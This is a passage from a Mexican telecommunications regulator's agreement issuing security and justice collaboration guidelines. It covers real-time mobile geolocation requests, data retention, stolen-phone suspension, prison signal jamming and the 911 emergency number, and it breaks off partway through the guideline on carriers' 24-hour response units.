Para coadyuvar con lo anterior y con fundamento en el artículo 190, fracción I, párrafo tercero, y fracción II, párrafo tercero de la LFTR, el Instituto sostuvo reuniones de trabajo con diversas autoridades tales como la Procuraduría General de la República, Policía Federal, Centro de Investigación y Seguridad Nacional, Coordinación Nacional Antisecuestro, Conferencia Nacional de Procuración de Justicia, Conferencia Nacional del Sistema Penitenciario, Comisión Nacional de Seguridad, Secretaría de la Defensa Nacional y Secretaría de Marina, con el objeto de escuchar sus necesidades y recibir sus propuestas que podrían contribuir en la definición de los mecanismos mediante los cuales los Concesionarios y, en su caso, los Autorizados deberán atender los requerimientos que estas les formulen, relativos a la colaboración con la justicia a que se refiere el Título Octavo de la LFTR. La evidencia documental se encuentra resguardada en los archivos del Instituto.

Derivado de dichas reuniones y de los mecanismos informados al Instituto, se determinó que hasta en tanto no se cuente con Plataformas Electrónicas con las características indicadas en los presentes lineamientos, se establece la adopción de alguna de las siguientes opciones de comunicación electrónica, que los Concesionarios y Autorizados pondrán a disposición de las autoridades a partir de la entrada en vigor del presente Acuerdo:

I. Correo electrónico Cifrado, y/o

II. Página electrónica con control de acceso.

Es relevante mencionar que el correo electrónico Cifrado es el primer paso para implementar un medio de solicitud y entrega de información conveniente para las autoridades; adicionalmente, se establece claramente que los requerimientos de información podrán ser realizados también a través de medios físicos, para evitar limitantes para las Autoridades Designadas que gestionarán dichos requerimientos.

A fin de contribuir a una colaboración efectiva y oportuna, los Lineamientos también establecen cómo deben recibir la información las autoridades, sería poco útil recibir la información en PDF o impresa y tener que capturarla para que pueda ser utilizada por las autoridades. En este sentido, los Lineamientos establecen que, independientemente que se pueda entregar impresa, la información también se deberá entregar en formato electrónico en archivos del tipo “.xls” o “.csv” que permitan su utilización inmediata.

Para contribuir a la colaboración efectiva y oportuna, el Instituto también asume su responsabilidad como administrador de la numeración telefónica nacional y, en tal sentido, pondrá a disposición de las autoridades la información de numeración, misma que incluirá aquella relacionada a números portados. En el mismo sentido, el Instituto impulsará ante las autoridades el establecimiento de Portales de Información que faciliten a los Concesionarios y Autorizados cerciorarse de que el requerimiento proviene de una autoridad competente.

Adicionalmente, en términos de la LFTR y a fin de atender oportunamente los requerimientos de las autoridades, los Concesionarios y Autorizados deberán establecer un Área Responsable que opere las 24 horas todos los días del año. A fin de evitar retrasos en potenciales respuestas negativas, por ejemplo cuando un requerimiento de información se envió al Concesionario o Autorizado equivocado, se prevé que estos contarán con un plazo máximo de una hora para cerciorarse de que corresponda o no a su Numeración Geográfica y que proviene de Autoridad Designada, esto de ninguna manera obliga a que la información deba entregarse en plazos menores a los establecidos en la LFTR.

Sin perjuicio de lo anterior, se prevé la evolución hacia Plataformas Electrónicas, como medio de solicitud y entrega de información con elementos robustos de seguridad de la información, así como con los mecanismos que sean necesarios para conservar el valor probatorio de la documentación intercambiada.

A fin de evolucionar de manera coordinada hacia Plataformas Electrónicas homologadas, los Lineamientos establecen la creación de Grupos de Trabajo. A través de estos grupos el Instituto coadyuvará con las autoridades, Concesionarios y Autorizados en la definición y adopción de medidas que permitan una colaboración más efectiva y oportuna. Entre otros, dichos Grupos de Trabajo darán seguimiento a la definición e implementación de, en su caso, nuevos requerimientos de información conforme a la evolución tecnológica de las telecomunicaciones.

2. De la localización geográfica en tiempo real de los equipos de comunicación móvil

En el informe publicado1 por el Centro de Investigación para el Desarrollo A.C. (CIDAC) en el 2013, titulado: “8 Delitos Primero, Índice Delictivo”, se enfatiza que el impacto que genera el secuestro en la sociedad es tan grande que un aumento de 10 secuestros por cada 100 mil habitantes aumenta la percepción de inseguridad en el país en más del 5%.

Al respecto, diversos Titulares de las Unidades Especializadas en Combate al Secuestro, entre los que se encuentran los de Sinaloa, Jalisco y Puebla, a través de la Coordinación Nacional Antisecuestro, manifestaron ante el Instituto que contar con los datos de localización geográfica en tiempo real de equipos de comunicación móvil, es fundamental para combatir los delitos de alto impacto, como lo es el secuestro, ya que en dichos casos se puede contar con evidencia contundente sobre una investigación, coadyuvando en el fortalecimiento y la veracidad en la integración de la carpeta de investigación.

Asimismo, y con base en el ejercicio de la acción penal, la representación social debe acreditar mediante las herramientas legales a su alcance el cuerpo del delito y la probable responsabilidad del indiciado, por lo que la facultad legal de solicitar la localización geográfica en tiempo real de los equipos de comunicación móvil asociados a una línea constituye una herramienta de investigación, cuyo ejercicio oportuno podría derivar en la pronta localización, no sólo del delincuente, sino de las víctimas, como es el caso del secuestro o en la efectiva identificación del lugar del que se hacen llamadas de extorsión. Esto explica que la localización geográfica en tiempo real sea especialmente útil en ilícitos en los que la celeridad en la localización geográfica de un Equipo o Dispositivo Terminal Móvil puede resultar fundamental, no solamente para lograr la captura de los sujetos activos, sino también para rescatar a las víctimas.

Es la eficacia y la oportunidad en la obtención de dicha información por parte de las autoridades en donde los presentes lineamientos hacen énfasis, ya que para alcanzar el objetivo de la localización geográfica se precisa el establecimiento de plataformas electrónicas y la obligación de enviar la información de localización inmediatamente después de haberse cerciorado de que el requerimiento provenga de una Autoridad Designada por los titulares de las Autoridades Facultadas de conformidad con lo dispuesto en el artículo 189 de la LFTR.

Con el objeto de que la información de localización geográfica en tiempo real sea efectiva, el Instituto establece parámetros de precisión y Rendimiento para las llamadas al número único armonizado de emergencias, los cuales deberán observarse en al menos el 60% de su red durante el primer año, el 70% en el segundo año y así sucesivamente, incrementando en 10% su cumplimiento, año con año hasta llegar al 90% en la totalidad de las redes de los Concesionarios. Dichos parámetros deberán observarse también para los requerimientos de localización geográfica en tiempo real realizados por las Autoridades Facultadas y/o Designadas. Sin perjuicio de lo anterior, y a efecto de que a través de herramientas de las propias autoridades se pueda mejorar la precisión de geolocalización en tiempo real, es necesario que en el envío de esta información, los Concesionarios y Autorizados también proporcionen el IMEI y el IMSI del Dispositivo o Equipo Terminal Móvil que se pretende localizar.

A efectos de que las autoridades cuenten con flexibilidad en la presentación de solicitudes de localización geográfica en tiempo real, se prevé que en éstas se pueden considerar parámetros reconfigurables relativos al tiempo de actualización de la información, ello sin necesidad de generar una nueva solicitud, lo anterior en función de las necesidades de dichas autoridades.

3. Del registro de datos de comunicaciones

En los últimos años, principalmente entre 2006 y 2011, se registró en el país un incremento de la violencia y la delincuencia, lo que impactó fuertemente los niveles de inseguridad de la población. No sólo se cometieron más delitos, sino que fueron más violentos (Human Rights Watch, 20112). Respecto a las denuncias de delitos del fuero común, los datos del Secretariado Ejecutivo del Sistema Nacional de Seguridad Pública (SESNSP) muestran que de 2006 a 2011 se registró un incremento en el número de denuncias; sin embargo, a partir de 2011 se observa una disminución de 1 725 894 denuncias en 2011 a 1 653 206 en 2013.3

Por otro lado, el costo total estimado que ha generado la inseguridad y el delito en 2014 alcanzó 226 mil 700 millones de pesos, lo que representó 1.27% del PIB según la ENCUESTA NACIONAL DE VICTIMIZACIÓN Y PERCEPCIÓN SOBRE SEGURIDAD PÚBLICA (INEGI, 2015a).4

El contexto delictivo antes señalado repercute directamente en la percepción de seguridad. En los últimos años, la inseguridad se posiciona como la principal preocupación de la ciudadanía, desplazando incluso a los problemas que tradicionalmente centraban dicha preocupación: el desempleo y la pobreza.

Así, la generación de más y mejor inteligencia para la seguridad pública es indispensable, la información para la toma de decisiones en esta materia debe fluir eficientemente entre las instituciones que la requieran.

Asimismo, el uso de las tecnologías de la información y comunicación es una herramienta indispensable para afrontar este reto, lo anterior aunado a que las Procuradurías de Justicia Estatales a través de la Conferencia Nacional de Procuración de Justicia5 manifestaron al Instituto que en el caso de delitos cometidos mediante la utilización de servicios de telecomunicaciones, los datos relativos a las comunicaciones efectuadas son indispensables para la investigación y persecución del delito.

Consecuentemente, las autoridades mencionadas en el párrafo anterior consideran que el oportuno registro, conservación y control de los datos que claramente se especifican en el lineamiento DÉCIMO CUARTO de los Lineamientos, son un elemento importante para averiguar, como mínimo, un componente de la ruta de una comunicación, a fin de prevenir, investigar y/o combatir delitos. Respecto a dicho lineamiento, la información de comunicaciones que los Concesionarios y, en su caso Autorizados, tendrán que registrar y conservar hasta por un plazo de 24 meses a partir de que se origina la comunicación, es aquella establecida en la fracción II del artículo 190 de la LFTR, es decir, cuando se trata de comunicaciones que utilizan recursos del Plan Técnico Fundamental de Numeración o conforme a la Recomendación de la Unión Internacional de Telecomunicaciones “UIT-T E.164. Plan internacional de numeración de telecomunicaciones públicas”. Lo anterior sin perjuicio de que, en el marco de los Grupos de Trabajo que se establecen en los Lineamientos, se definan e implementen, en su caso, nuevos requerimientos de información conforme a la evolución tecnológica de las telecomunicaciones.

Es importante señalar que diversas autoridades manifestaron que un alto porcentaje de delitos llevados a cabo mediante Dispositivos o Equipos Terminales Móviles, se realiza utilizando equipos en la modalidad de prepago. Por lo que, enfatizaron la importancia de contar con información relacionada con el equipo que les permitan iniciar líneas de investigación.

4. De la transparencia y protección de datos

Escuchando al entonces Instituto Federal de Acceso a la Información y Protección de Datos y contemplando que en México existen diversas disposiciones que protegen la vida y comunicaciones privadas de las personas en el orden administrativo, civil, penal y de responsabilidad patrimonial del Estado, se considera que existe un marco jurídico que brinda protección al individuo frente a injerencias ilegales en su vida privada, se establece en la LFTR y consecuentemente en los presentes Lineamientos la prohibición de utilizar los datos conservados para fines distintos a los previstos en los mismos y se prevé que cualquier uso distinto será sancionado por las autoridades competentes en los términos administrativos y penales que resulten aplicables.

La sociedad de la información, fundada en el avance de la tecnología, ofrece al individuo ventajas diversas que contribuyen a mejorar su calidad de vida y, en el caso del Estado, a mejorar la actividad administrativa, el desarrollo económico, social y cultural, así como el cumplimiento de las obligaciones ciudadanas frente a éste. Al mismo tiempo, una indebida utilización de las herramientas tecnológicas puede convertirse en un factor de amenaza a la privacidad y seguridad de las personas.

En este orden de ideas, los presentes Lineamientos son enfáticos en establecer las características con que deberán contar los sistemas de los Concesionarios y Autorizados a fin de garantizar la integridad y seguridad de la información transmitida, manejada y resguardada, tomando como base estándares internacionales, particularmente, aquellos relacionados con la salvaguarda y protección de los Datos Personales de los usuarios, así como para la cancelación y supresión segura de la información.

5. De la suspensión del servicio de los Dispositivos o Equipos o Terminales Móviles reportados como robados o extraviados

Conforme a lo manifestado por la Policía Federal, la Procuraduría General de la República, la Coordinación Nacional Antisecuestro y la Conferencia Nacional de Procuración de Justicia, entre otras, los delitos derivados del uso ilegal de los equipos de comunicación móvil, del servicio de Internet y de los sistemas informáticos, se han convertido en un asunto de prioridad nacional. En este sentido, el Consejo Ciudadano de la Ciudad de México, en conjunto con la Asociación Nacional de Telecomunicaciones, han informado que el robo de teléfonos móviles o celulares es el delito que más se comete en el país, pues de acuerdo con la Encuesta Nacional de Victimización y Percepción Sobre Seguridad Pública del Instituto Nacional de Estadística y Geografía (“INEGI”)6, de las 9 millones 780 mil denuncias de robo a transeúnte, 57% corresponde al robo de teléfono celular.

En estadísticas de 2013, el INEGI dio a conocer que fueron un total de 5 millones 600 mil aparatos los que se denunciaron como robados, los cuales frecuentemente son utilizados para extorsionar o realizar secuestros virtuales, por lo que en los Lineamientos se establecen los mecanismos para que los usuarios y las autoridades competentes soliciten a los Concesionarios y Autorizados la suspensión de los servicios de los dispositivos robados, así como para evitar la activación de los mismos cuando dichos dispositivos hayan sido reportados como robados o extraviados; para tales efectos, se establecen las disposiciones generales de carácter obligatorio para que los Concesionarios y Autorizados presenten al Instituto, un procedimiento uniforme que permita que los usuarios reporten los Dispositivos o Equipos o Terminales Móviles que hayan sido robados o extraviados y a la vez, el referido procedimiento establezca los pasos para que los Concesionarios y Autorizados suspendan los servicios de los Dispositivos o Equipos Terminales Móviles, dando así certeza jurídica a los usuarios de servicios de telefonía móvil en cuanto a la suspensión de aparatos móviles con dicho reporte.

En este tenor de ideas, el Instituto, a efectos de coadyuvar con la prevención del robo de equipos y proteger a los usuarios de servicios de telecomunicaciones, y conforme al artículo 289 de la LFTR establece que los Concesionarios y Autorizados no deberán activar en sus redes Dispositivos o Equipos Terminales Móviles no homologados, con excepción de aquellos que se encuentren haciendo uso de la itinerancia internacional. Asimismo, el Instituto pondrá a disposición del público en general en su portal de Internet una base de datos de los Dispositivos o Equipos Terminales Móviles que cuentan con certificado de homologación emitido por el mismo, lo anterior aunado a que mediante una estrecha coordinación entre el Instituto, los Concesionarios y Autorizados, se realizarán campañas de sensibilización dirigida a los usuarios acerca de los riesgos asociados con el uso de Dispositivos o Equipos Terminales Móviles no homologados o falsificados.

6. De la cancelación o anulación de manera permanente de las señales de telefonía celular, de radiocomunicación o de transmisión de datos o imagen dentro del perímetro de centros o establecimientos penitenciarios

En estricto apego a lo manifestado por las Autoridades Penitenciarias y dado que en nuestro país desde el interior de los centros penitenciarios se podrían llevar a cabo delitos utilizando equipos móviles, para los efectos de lo mandatado en el artículo 190, fracción VIII de la LFTR, se considera necesario hacer una remisión a los ”Lineamientos de Colaboración entre Autoridades Penitenciarias y los Concesionarios de Servicio de Telecomunicaciones y Bases Técnicas para la Instalación y Operación de Sistemas de Inhibición” publicado en el DOF el 3 de septiembre de 2012. Adicionalmente, a fin de fortalecer los lineamientos antes mencionados en el ámbito de atribuciones del Instituto, se establece que los equipos de bloqueo de señales que sean instalados con base en los referidos lineamientos deberán cumplir con las disposiciones técnicas que emita el Instituto y demás normatividad aplicable.

7. Del número único armonizado a nivel nacional para la prestación de servicios de emergencia y de la prioridad de las comunicaciones en casos de emergencia

Con relación al mandato legal que tienen los Concesionarios y Autorizados de implementar un número único armonizado a nivel nacional, y en su caso, mundial para servicios de emergencia, en los términos y condiciones que determine el propio Instituto, en coordinación con el Sistema Nacional de Seguridad Pública, los presentes Lineamientos establecen como número único el 911 (nueve, uno, uno), así como el mecanismo para la puesta en operación de dicho número único de emergencia, ello en virtud de ser uno de los números más reconocidos a nivel mundial para este tipo de servicios.

Al respecto, considerando lo establecido en el Reglamento de Telecomunicaciones Internacionales de la UIT, y dada la difusión y aceptación del referido número de emergencia 911 en países como, Estados Unidos de América, Canadá, Argentina, Uruguay, entre otros, se determina que el número único de emergencia sea el 911.

Lo anterior, hace necesario modificar los numerales 5.4.1 y 5.4.2. y adicionar el numeral 5.4.3 al Plan Técnico Fundamental de Numeración, con el objeto de implementar el número único armonizado a nivel nacional para la prestación de servicios de emergencia de tres dígitos 911, en los plazos que indique el Secretariado Ejecutivo del Sistema Nacional de Seguridad Pública. Esto también requiere reservar el Número Identificador de Región y, en su momento, liberar las series numéricas que inicien con 911. Al respecto, el Secretariado Ejecutivo del Sistema Nacional de Seguridad Pública manifestó lo siguiente:

“El gobierno federal tiene como propósito homologar el servicio para la atención de llamadas de emergencia a nivel nacional y elevar la calidad en la prestación del mismo, lo que supone entre otros, reducir los tiempos de respuesta y mejorar el despliegue, coordinación y operación de diversas instancias, además de los concesionarios. Lograrlo requiere articular la participación de instituciones en los tres órdenes de gobierno, de organizaciones civiles y de empresas en un marco de certidumbre, así como prever los recursos, acciones y etapas necesarias para su adecuada implementación. En este sentido, es necesario que los Lineamientos establezcan obligaciones y tiempos para los concesionarios en congruencia con este esfuerzo integral, brindando con ello claridad y certidumbre al conjunto de sujetos involucrados directa e indirectamente.”

Conforme a lo establecido en el artículo 190, fracción IX, de la LFTR se indican mecanismos que permiten identificar y ubicar geográficamente llamadas y, en su caso, mensajes de texto, de emergencia. Para efectos del servicio móvil, se establecen parámetros de precisión para ubicar efectivamente el origen de dichas llamadas y mensajes de emergencia. Dichos parámetros se establecen en base a diversas prácticas regulatorias internacionales, entre otras, de Estados Unidos de América, Canadá y Brasil.

En adición a lo anterior, y a efecto de que la atención a emergencias se realice de la manera más ágil posible, los presentes Lineamientos establecen además la obligación de los Concesionarios y Autorizados de dar prioridad y tramitar gratuitamente las comunicaciones destinadas al número único de emergencia 911. En el mismo sentido, y a fin de prevenir a la población en Situaciones de Emergencia, las comunicaciones que se generen con motivo de dichas situaciones también deberán recibir tratamiento prioritario y gratuito.

8. De los estudios e investigaciones que permitan inhibir y combatir la utilización de equipos de telecomunicaciones para la comisión de delitos o actualización de riesgos o amenazas a la seguridad nacional

A efectos de que los Concesionarios, Autorizados y las organizaciones a que se refiere el artículo 190, fracción XII, de la LFTR realicen, bajo la coordinación del Instituto, estudios e investigaciones que tengan por objeto el desarrollo de soluciones tecnológicas que permitan inhibir y combatir la utilización de equipos de telecomunicaciones para la comisión de delitos o actualización de riesgos o amenazas a la seguridad nacional, el Instituto coordinará un Comité Especializado integrado por los referidos Concesionarios, Autorizados y organizaciones.

Sexto.- El segundo párrafo del artículo 51 de la LFTR establece que previo a la emisión de reglas, lineamientos o disposiciones administrativas de carácter general de que se trate, el Instituto deberá realizar y hacer público un análisis de impacto regulatorio o, en su caso, solicitar el apoyo de la Comisión Federal de Mejora Regulatoria. Al respecto, se menciona que la Unidad de Política Regulatoria del Instituto realizó el Análisis de Impacto Regulatorio correspondiente, mismo que fue sometido formalmente a opinión no vinculante de la Coordinación General de Mejora Regulatoria del propio Instituto.

En respuesta a lo anterior, mediante oficio IFT/211/CGMR/143/2015 del 10 de noviembre de 2015, la Coordinación General de Mejora Regulatoria emitió la opinión no vinculante respecto del proyecto de Lineamientos de Colaboración en Materia de Seguridad y Justicia, en la cual no se encuentran aspectos que impacten en el contenido del proyecto. No obstante, en dicho oficio se informa que una vez que entren en vigor los Lineamientos en mención, se deberán remitir a esa Coordinación General los trámites que serán inscritos en el Inventario de Trámites y Servicios del Instituto, observación que será cumplida en el momento procesal oportuno.

Por las razones antes expuestas, con fundamento en lo dispuesto por los artículos 28, párrafo vigésimo, fracción IV, de la Constitución Política de los Estados Unidos Mexicanos; 1, 2, 3, 7, 15 fracción I, 124, 189 y 190 de la Ley Federal de Telecomunicaciones y Radiodifusión, Trigésimo Séptimo transitorio del Decreto por el que se expiden la Ley Federal de Telecomunicaciones y Radiodifusión, y la Ley del Sistema Público de Radiodifusión del Estado Mexicano; y se reforman, adicionan y derogan diversas disposiciones en materia de telecomunicaciones y radiodifusión, publicado en el Diario Oficial de la Federación el 14 de julio de 2014; y, 1, 4, fracción I, 6, fracciones XVIII y XXV, 19, fracción VI, 22, fracción I, y 23, fracción XV, del Estatuto Orgánico del Instituto Federal de Telecomunicaciones, el Pleno del Instituto emite el presente:

ACUERDO

ARTÍCULO PRIMERO.- Se emiten los Lineamientos de Colaboración en Materia de Seguridad y Justicia en los siguientes términos:

LINEAMIENTOS DE COLABORACIÓN EN MATERIA DE SEGURIDAD Y JUSTICIA

CAPÍTULO I

DISPOSICIONES GENERALES

PRIMERO.- El objeto de los presentes Lineamientos es establecer disposiciones administrativas de carácter general para que la colaboración de los Concesionarios y Autorizados con las instancias de seguridad, procuración y administración de justicia sea oportuna y efectiva, y emitir las demás disposiciones conforme al Título Octavo de la Ley Federal de Telecomunicaciones y Radiodifusión y demás normatividad aplicable, salvaguardando siempre y en todo momento la protección de la privacidad y los Datos Personales de los usuarios y los demás derechos protegidos por la Constitución Política de los Estados Unidos Mexicanos y los tratados internacionales en los que México sea parte.

Los Concesionarios, los Autorizados y los proveedores de servicios de aplicaciones y contenidos están obligados a atender todo mandamiento por escrito, fundado y motivado de la autoridad competente en los términos que establezcan las leyes aplicables.

En caso de no contar con la infraestructura y los medios necesarios para cumplir con los presentes Lineamientos, los Autorizados deberán contratar con los Concesionarios los servicios necesarios, quienes estarán obligados a prestar a los Autorizados dichos servicios.

SEGUNDO.- Para efectos de los presentes Lineamientos, además de las definiciones previstas en la Ley Federal de Telecomunicaciones y Radiodifusión y demás disposiciones legales, reglamentarias y administrativas aplicables, se entenderá por:

I. Área Responsable: área designada por los Concesionarios y Autorizados disponible las veinticuatro horas del día, los trescientos sesenta y cinco días del año, para la atención de los requerimientos de las Autoridades Designadas sobre localización geográfica en tiempo real de los equipos de comunicación móvil, entrega de datos conservados, así como intervención de comunicaciones privadas;

II. Autoridades Designadas: todo aquel servidor público que haya sido designado por los titulares de las Autoridades Facultadas mediante acuerdos publicados en el Diario Oficial de la Federación, de conformidad con lo dispuesto en el artículo 189 de la LFTR, para gestionar los requerimientos que, en los términos establecidos en las leyes aplicables, se realicen a los Concesionarios y los Autorizados, y recibir la información correspondiente;

III. Autoridades Facultadas: instancias de seguridad, procuración de justicia y administración de justicia que, conforme a sus atribuciones previstas en sus leyes aplicables o en acuerdos delegatorios, cuenten con la facultad expresa para requerir la localización geográfica en tiempo real de los equipos de comunicación, así como la entrega de los datos conservados por los Concesionarios y Autorizados;

IV. Autorizados: aquéllos que cuenten con título habilitante para establecer y operar o explotar una comercializadora de servicios de telecomunicaciones sin tener el carácter de Concesionario, o para explotar los derechos de emisión y recepción de señales de satélites extranjeros que cubran y puedan prestar servicios en el territorio nacional;

V. Cifrado: proceso que hace que los datos sean ilegibles para entidades no autorizadas, aplicando un algoritmo criptográfico;

VI. Comité Especializado: el Comité Especializado de Estudios e Investigaciones en Telecomunicaciones cuyas funciones se precisan en los presentes Lineamientos;

VII. Comité Técnico de Portabilidad: el Comité Técnico en Materia de Portabilidad, Numeración y Señalización, presidido y coordinado por el Instituto, cuya integración, carácter y facultades se establecen en las Reglas de Portabilidad Numérica, publicadas en el Diario Oficial de la Federación el 12 de noviembre de 2014;

VIII. Concesionario: persona física o moral, titular de una concesión única o de red pública de telecomunicaciones que les permite prestar servicios públicos de telecomunicaciones.;

IX. Datos Personales: cualquier información concerniente a una persona física identificada o identificable;

X. Desastre: al resultado de la ocurrencia de uno o más agentes perturbadores severos y o extremos, concatenados o no, de origen natural, de la actividad humana o aquellos provenientes del espacio exterior, que cuando acontecen en un tiempo y en una zona determinada, causan daños y que por su magnitud exceden la capacidad de respuesta de la comunidad afectada, en los términos definidos en la Ley General de Protección Civil;

XI. Dispositivo o Equipo Terminal Móvil: equipo que utiliza el Usuario para conectarse más allá del punto de conexión terminal de una red pública con el propósito de tener acceso y/o recibir uno o más servicios de telecomunicaciones móviles;

XII. DOF: Diario Oficial de la Federación;

XIII. ETSI TS: Estándar Técnico del Instituto Europeo de Normas de Telecomunicaciones (European Telecommunications Standard Institute Technical Specification por sus siglas en inglés);

XIV. IMEI: código de identidad de fabricación del equipo, (International Mobile Equipment Identity number, por sus siglas en inglés);

XV. IMSI: identidad internacional de suscripción al servicio móvil conforme a la Recomendación UIT-T E.212, Plan de identificación internacional para redes públicas y suscripciones; o código de identidad internacional del usuario móvil, (International Mobile Subscriber Identity, por sus siglas en inglés,);

XVI. Instituto: Instituto Federal de Telecomunicaciones;

XVII. ISO/IEC: Organización Internacional de Normalización/Comisión Electrotécnica Internacional (International Organization for Standardization/International Electrotechnical Commission, por sus siglas en inglés);

XVIII. LFTR: Ley Federal de Telecomunicaciones y Radiodifusión;

XIX. Localidad Rural: aquella que tiene una población menor a 2 500 habitantes y no es cabecera municipal;

XX. Localidad Suburbana: aquella en donde la población es de 2 500 a 14 999 habitantes, donde las viviendas se encuentran dispersas y en algunas ocasiones carecen de algunos servicios;

XXI. Localidad Urbana: área habitada o urbanizada que partiendo de un núcleo central, presenta continuidad física en todas direcciones hasta ser interrumpida, en forma notoria, por terrenos de uso no urbano como bosques, sembradíos o cuerpos de agua. Se caracteriza por presentar asentamientos humanos concentrados de más de 15 000 habitantes. En estas áreas, se asienta la administración pública, el comercio organizado y la industria. Cuenta con infraestructura, equipamiento y servicios urbanos, tales como drenaje, energía eléctrica, red de agua potable, escuelas, hospitales, áreas verdes y de diversión, entre otros o es cabecera municipal independientemente del número de habitantes;

XXII. NIST: Instituto Nacional de Normas y Tecnología (National Institute of Standards and Technology, por sus siglas en inglés);

XXIII. Número 911: número único armonizado a nivel nacional para servicios de emergencia, a través del cual la ciudadanía reporta emergencias, faltas y delitos que son canalizados a las instituciones de procuración de justicia, seguridad pública, salud, protección civil y las demás instituciones asistenciales públicas y privadas para su atención;

XXIV. Número Geográfico: combinación de dígitos que identifican unívocamente a un destino geográfico dentro de una red de telecomunicaciones, de conformidad con el Plan Técnico Fundamental de Numeración;

XXV. Plataforma Electrónica: sistemas electrónicos que permitan la gestión, manejo, procesamiento, almacenamiento y/o transmisión de datos e información, entre los Concesionarios y Autorizados y las Autoridades Facultadas y Designadas, a través de cualquier medio de transmisión, que cuenta con mecanismos para garantizar la seguridad e integridad de la información relativa a los requerimientos de localización geográfica en tiempo real de los equipos de comunicación móvil, así como sobre entrega de datos conservados;

XXVI. Portal de Información: base de datos que podrá ser establecida y administrada por las Autoridades Designadas o Autoridades Facultadas, por sí mismas o a través de sus Conferencias Nacionales, para consulta de los Concesionarios y Autorizados. Esta base de datos podrá incluirse en el portal de Internet de las mencionadas autoridades y contener información relativa a sus Autoridades Designadas, las fechas de publicación en el DOF de los acuerdos de designación, las facultades expresas en los términos que establezcan las leyes aplicables para requerir información sobre localización geográfica en tiempo real de los equipos de comunicación o entrega de datos conservados por los Concesionarios y Autorizados, así como la información adicional que aquellas consideren necesaria;

XXVII. Rendimiento: porcentaje de llamadas que deben cumplir los Concesionarios y Autorizados con la precisión definida en los presentes Lineamientos para los efectos de la localización geográfica en tiempo real;

XXVIII. Secretariado Ejecutivo: Secretariado Ejecutivo del Sistema Nacional de Seguridad Pública;

XXIX. Situaciones de Emergencia: aquellas que pueden causar un daño a la sociedad y propiciar un riesgo excesivo para la seguridad e integridad de la población en general, generada o asociada con la inminencia, alta probabilidad o presencia de un agente perturbador, en términos de lo previsto en la Ley General de Protección Civil, y

XXX. Tipo de Comunicación: las clasificadas como voz, buzón vocal, conferencia, datos, servicios suplementarios (incluidos el reenvío o transferencia de llamada), servicios de mensajería o multimedia (incluidos los servicios de mensajes cortos, servicios multimedia y avanzados).

TERCERO.- Sin perjuicio de lo establecido en la LFTR respecto a la protección, tratamiento y control de los Datos Personales en posesión de los Concesionarios o de los Autorizados, así como de los proveedores de servicios y aplicaciones, es aplicable lo dispuesto en la Ley Federal de Protección de Datos Personales en Posesión de los Particulares. Las autoridades a que se refiere el artículo 189 de la LFTR, estarán sujetas a las disposiciones legales y administrativas que en materia de protección, tratamiento y control de Datos Personales resulten aplicables.

CAPÍTULO II

DISPOSICIONES APLICABLES A LOS REQUERIMIENTOS DE LOCALIZACIÓN GEOGRÁFICA EN TIEMPO REAL Y ENTREGA DE DATOS CONSERVADOS

CUARTO.- Las Autoridades Facultadas y Designadas procurarán que en la gestión ante los Concesionarios y Autorizados de los requerimientos de localización geográfica en tiempo real de los Dispositivos o Equipos Terminales Móviles, así como de entrega de los datos conservados por éstos, se establezca la siguiente información:

a) Fecha y lugar;

b) Nombre y cargo del servidor público requirente e Institución a la que pertenece;

c) Fecha en que se publicó en el DOF la designación de la Autoridad Designada;

d) Fundamento legal del requerimiento;

e) Número(s) telefónico(s) a diez dígitos, IMSI o IMEI objeto del requerimiento;

f) Objeto de la solicitud:

i. Localización geográfica en tiempo real y/o

ii. Entrega de datos conservados;

g) Periodo por el que se solicita la información;

h) Formatos en el que se requiere sea entregada la información (por ejemplo “pdf”, “.xls” o “.csv”);

i) Sello de la Institución, y

j) Firma autógrafa o electrónica del servidor público designado.

Respecto a los requerimientos que se encuentren en trámite con los Concesionarios y Autorizados, se dará prioridad a aquellos que se refieran a situaciones en donde se encuentre en peligro la vida de una o más personas o se trate de alguna amenaza a la Seguridad Nacional.

Asimismo, en los casos en que las leyes aplicables así lo establezcan, las Autoridades Designadas deberán adjuntar la autorización judicial en términos del artículo 16 de la Constitución Política de los Estados Unidos Mexicanos.

Con la finalidad de homologar las solicitudes que realicen a los Concesionarios y Autorizados, las Autoridades Designadas podrán utilizar el “Formato para la gestión de Requerimientos de Información en materia de Seguridad y Justicia”, que se adjunta a los presentes Lineamientos como “Anexo I”, y favorecerán la utilización de medios electrónicos para realizar los requerimientos. En la presentación del requerimiento ante los Concesionarios y Autorizados, no será necesario para las Autoridades Designadas adjuntar copia del acuerdo de designación.

A efecto de que las Autoridades Designadas consulten la información relativa a los Concesionarios o Autorizados que atienden el Número Geográfico, el Instituto la pondrá a disposición a través de su portal de Internet, incluyendo los números portados.

QUINTO.- Los Concesionarios y Autorizados deberán atender los requerimientos que se presenten por medios físicos (en papel) o por medios electrónicos y deberán responder a dicho requerimiento por el mismo medio en que los recibieron, siempre que no exista otra disposición expresa de la autoridad competente.

En el caso de requerimientos presentados por medios electrónicos, los Concesionarios y Autorizados deberán incluir en su respuesta los archivos en formato “.pdf”, “.csv”, “.xls” u otros que les hayan sido indicados por las Autoridades Designadas, sin leyendas o claves de seguridad que impidan o limiten su utilización.

Las Autoridades Designadas podrán acordar con los Concesionarios y Autorizados los campos que contendrán los archivos “.pdf”, “.csv” o “.xls” a los que se refiere el presente lineamiento.

SEXTO.- El Instituto impulsará el establecimiento de Portales de Información por parte de las Autoridades Facultadas, los cuales se pondrán a disposición de los Concesionarios y Autorizados para consultar la información referente a las Autoridades Designadas, las fechas de publicación en el DOF de los acuerdos de designación, las facultades expresas en los términos que establezcan las leyes aplicables y direcciones de correo electrónico, a los cuales se podrá acceder mediante el mecanismo de identificación que determinen dichas autoridades.

Dichos Portales de Información podrán contar con un vínculo al portal del Instituto en el cual las Autoridades Designadas podrán consultar la Numeración Geográfica, incluyendo los números portados.

SÉPTIMO.- Los Concesionarios y Autorizados están obligados a atender los requerimientos de las Autoridades Designadas, conforme a lo dispuesto en el presente lineamiento:

A. Del Área Responsable para atender los requerimientos sobre localización geográfica en tiempo real de los Dispositivos o Equipos Terminales Móviles, entrega de datos conservados e intervención de comunicaciones privadas:

I. Deberán contar con un Área Responsable disponible las veinticuatro horas del día, los trescientos sesenta y cinco días del año, para la atención de los requerimientos sobre localización geográfica en tiempo real de los equipos de comunicación móvil, entrega de datos conservados, así como intervención de comunicaciones privadas;

